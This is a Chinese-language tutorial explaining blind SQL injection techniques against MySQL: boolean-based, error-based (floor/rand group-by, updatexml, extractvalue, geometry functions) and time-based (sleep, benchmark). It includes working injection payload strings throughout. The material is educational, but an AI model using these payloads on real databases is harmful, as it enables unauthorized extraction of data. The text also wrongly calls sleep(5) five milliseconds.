普通的sql注入大致可以通过在提交框中输入单引号、双引号和括号等看网页的返回内容来判断,但有很多网站并不会将一些敏感数据显示到前端,而它们仍然是存在sql注入漏洞的。那么黑客面对这种不回显的sql注入漏洞,也可以通过一些方法和技巧实现他们的目的,获取到他们想要的一些信息,这个过程就称为sql盲注。
如果注入的成功与否,页面的返回值会有差异的话,那么可以调取函数做一些比较操作,通过观察页面的返回做布尔值的盲注,就是一个一个字符去比对去验证。如果页面完全没有任何返回差异的话,也不是毫无办法,可以做基于时间的盲注。
基于布尔值的sql盲注
sql注入需要我们对sql语句及一些函数做到熟悉及灵活运用。
截取字符串常用函数
盲注有时需要一个一个字符去猜,因此一些字符串操作的函数经常被用到。
mid(column_name,start,length)函数
其功能为截取字符串,其中columa_name为要截取的字段参数,start参数表示开始截取的位置(起始值是1),length参数表示要截取的长度,非必需,如果不填则默认截取到最后。
其中column_name参数也可以是其他函数或是select语句,如:MID(DATABASE(),1,1)表示数据库名字的第一位,MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=xxx LIMIT 0,1),1,1)表示某查询语句的返回值的第一位,其中语句可以自行构造注入。
substr(string, start, length)函数
此函数功能与mid()函数类似,参数也一样,可以替换使用。
Left(string,n)函数
此函数功能为得到string字符串的左面指定n位的字符,如Left(database(),1)表示数据库名的左边一位,Left(database(),2)表示数据库名的左边两位。
ORD()函数和ASCII()函数
作用相同,将字符转为ascii 值,如ORD(MID(DATABASE(),1,1))>114 意为检测database()的第一位ASCII码是否大于114,也即是‘r’。
正则表达式攻击
使用正则表达式是因为这样更加灵活,如正则表达式中 ^[a-z] 表示字符串中开始字符是在 a-z范围内,这样就可以不用一个一个去试,节省时间。
select user() regexp '^[a-z]' 这句话就是正则表达式的用法,这里user()是root,有下图
正确的时候返回1,错误时返回0。
like匹配注入
和正则表达式一样,为了提高匹配效率的一种方法,应用如下图:
基于报错的sql盲注
参考博客:sql注入报错注入原理解析
报错型sql注入原理分析
报错型注入是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果。其他数据库也有类似的问题,但我们在这里暂且不提。
Bug 8652的主要内容就是在使用group by 对一些rand()函数进行操作时会返回duplicate key 错误,而这个错误将会披露关键信息,如
"Duplicate entry '####' for key 1"
这里的####正是用户输入的希望查询的内容,而该bug产生的主要原因就是:在rand()和group by同时使用到的时候,可能会产生超出预期的结果,因为会多次对同一列进行查询
对这个bug进行利用要求我们构造出一些能触发这种bug的语句,网上有一些公式来触发:
?id=1' union Select 1,count(*),concat(你希望的查询语句,floor(rand(0)*2))a from information_schema.columns group by a--+
其中rand函数作用是产生一个0-1的随机数,floor的作用是向下取整。
原理是这样,rand函数得出的序列是关键。
mysql在遇到select count(*) from tables group by x;这语句的时候会建立一个虚拟表(实际上就是会建立虚拟表),整个工作流程就会如下图所示:
1.先建立虚拟表,如下图(其中key是主键,不可重复)
2.开始查询数据,取数据库数据,然后查看虚拟表存在不,不存在则插入新记录,存在则count(*)字段直接加
由此看到 如果key存在的话就+1, 不存在的话就新建一个key。
mysql官方有给过提示,就是查询的时候如果使用rand()的话,该值会被计算多次,那这个“被计算多次”到底是什么意思,就是在使用group by的时候,floor(rand(0)*2)会被执行一次,如果虚表不存在记录,插入虚表的时候会再被执行一次,我们来看下floor(rand(0)*2)报错的过程就知道了,从0x04可以看到在一次多记录的查询过程中floor(rand(0)*2)的值是定性的,为011011…(记住这个顺序很重要),报错实际上就是floor(rand(0)*2)被计算多次导致的。
所以这整个流程是这样,在查询前系统会默认建立一张虚拟表,之后取第一条记录,执行floor(rand(0)*2),结果为零,虚表中不存在结果为0的序列,因此会被插入,但这个时候rand会再次执行一次,此时的结果变为1,因此插入虚表的序列就变成了1,之后查询第二条时发现结果为1,此时我们不会再计算rand而是直接将count加一,插入第三条时,rand结果为零,虚表中不存在结果为零的序列,因此要新建一项,在新建时再次计算rand,此时的结果计算出是1,而1已经存在于虚拟表中,再新建一个主键为1的会导致主键冲突,因此直接报错。
floor(rand()*2)报错
由于没加入随机因子,所以floor(rand()*2)是不可测的,因此在两条数据的时候,只要出现下面情况,即可报错
前面几条记录查询后不能让虚表存在0,1键值,如果存在了,那无论多少条记录,也都没办法报错,因为floor(rand()*2)不会再被计算做为虚表的键值,这也就是为什么不加随机因子有时候会报错,有时候不会报错的原因。
通过floor函数:select * from message where id=1 union select * from (select count(*), concat(floor(rand(0)*2),(select user())) a frominformation_schema.tables group by a)b
其他方式
通过updatexml函数:select *from message where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);
updatexml的爆错原因很简单,updatexml第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错。updatexml的最大长度是32位的,所以有所局限(PS:但是应对大多的已经足够。)如果密码长度超过了32位就不会被显示出来。
通过extractvalue函数:select * from message where id=1 and extractvalue(1,concat(0x7c,(select user())));
此外还有:id =1 and EXP(~(SELECT * from(select user())a))
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))
以上六个函数原理类似,执行如下:
基于时间的sql盲注
基于时间的盲注其实和基于布尔值的盲注差不多,只是关于对错的参考物变成了时间,并且会涉及到一些有关时间的函数。基于布尔值的盲注基本是将系统字符串拆分并逐个比较,根据页面返回的变化来判断。基于时间的sql盲注原理并没有太大的改变,只是想办法把对错与时间绑定在一起而已,为此我们需要用到以下一些新的函数。
If(ascii(substr(database(),1,1))>115,0,sleep(5))%23
上面这句话使用了IF将字符比较与sleep5毫秒连接到了一起,IF的用法很好理解,if(a,b,c),a是一个判断语句,如果a为真就返回b,如果a为假就返回c。上面这句话就是做了一个 字符串比较操作,如果对应ascii码不大于115,就执行sleep(5),这样我们就可以观察到。
select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8,9,.'));
上面这句话意思是在0-9中找版本中的第一位,不同的数字会有不同的返回时间,不过这只是一个理论情况,我们肉眼是无法分辨这样微小的时间差异的,不过如果用到循环的话是可以实现的,比如下面的benchmark。
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘MSG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;
BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。但这会占用大量的cpu资源,因此如果可以用sleep()函数替代,我们更推荐后者。